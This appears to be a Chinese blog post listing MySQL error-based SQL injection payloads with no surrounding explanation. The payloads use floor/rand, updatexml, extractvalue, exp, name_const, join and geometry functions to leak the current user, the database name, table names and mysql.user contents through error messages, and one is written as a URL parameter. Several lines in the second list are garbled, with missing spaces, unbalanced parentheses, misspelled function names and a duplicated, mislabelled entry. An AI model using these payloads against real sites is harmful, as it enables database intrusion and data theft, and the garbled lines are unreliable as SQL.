常用的三个报错注入语句:
floor报错
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
union select count(*),1,concat((select table_name from information_schema.tables where table_schema = '数据库名' limit 1,1),floor(rand(0)*2))as a from information_schema.tables group by a --+
updatexml报错
and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+
and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='数据库名'),0x7e),1)) --+
extractvalue报错
and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+
?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='数据库名'))) --+
其他报错注入语句:
exp and exp(~(select * from (select user () ) a) );
join select * from(select * from mysql.user ajoin mysql.user b)c;
name_const and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c);
GeometryCollection() and GeometryCollection(()select *from(select user () )a)b );
polygon () and polygon (()select * from(select user ())a)b );
multipoint () and multipoint (()select * from(select user() )a)b );
multlinestring () and multlinestring (()select * from(selectuser () )a)b );
multlinestring () and multpolygon (()select * from(selectuser () )a)b );
multlinestring () and multpolygon (()select * from(selectuser () )a)b );
linestring () and linestring (()select * from(select user() )a)b );
标签:语句,concat,0x7e,报错,user,注入,select,schema From: https://www.cnblogs.com/juejuezi/p/17016481.html